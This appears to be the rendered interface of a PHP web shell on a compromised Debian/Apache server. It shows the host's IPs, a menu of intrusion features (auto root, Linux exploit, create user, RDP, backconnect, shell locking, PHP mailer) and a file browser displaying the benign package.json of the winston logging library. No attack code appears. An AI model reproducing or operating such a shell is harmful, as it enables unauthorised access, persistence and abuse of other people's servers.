Linux ip-172-26-5-244 6.1.0-28-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.119-1 (2024-11-22) x86_64
Apache
: 172.26.5.244 | : 216.73.216.21
Cant Read [ /etc/named.conf ]
8.3.14
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
opt /
bitnami /
nami /
node_modules /
winston /
[ HOME SHELL ]
Name
Size
Permission
Action
lib
[ DIR ]
drwxr-xr-x
node_modules
[ DIR ]
drwxr-xr-x
test
[ DIR ]
drwxr-xr-x
CHANGELOG.md
20.14
KB
-rw-r--r--
LICENSE
1.03
KB
-rw-r--r--
README.md
26.6
KB
-rw-r--r--
index.d.ts
15.62
KB
-rw-r--r--
package.json
938
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "winston", "description": "A multi-transport async logging library for Node.js", "version": "2.4.5", "author": "Charlie Robbins <charlie.robbins@gmail.com>", "maintainers": [ "Jarrett Cruger <jcrugzz@gmail.com>", "Alberto Pose <albertopose@gmail.com>" ], "repository": { "type": "git", "url": "https://github.com/winstonjs/winston.git" }, "keywords": [ "winston", "logging", "sysadmin", "tools" ], "dependencies": { "async": "~1.0.0", "colors": "1.0.x", "cycle": "1.0.x", "eyes": "0.1.x", "isstream": "0.1.x", "stack-trace": "0.0.x" }, "devDependencies": { "cross-spawn-async": "^2.0.0", "hock": "1.x.x", "std-mocks": "~1.0.0", "vows": "0.7.x" }, "main": "./lib/winston", "scripts": { "test": "vows --dot-matrix --isolate" }, "types": "./index.d.ts", "engines": { "node": ">= 0.10.0" }, "license": "MIT" }
Close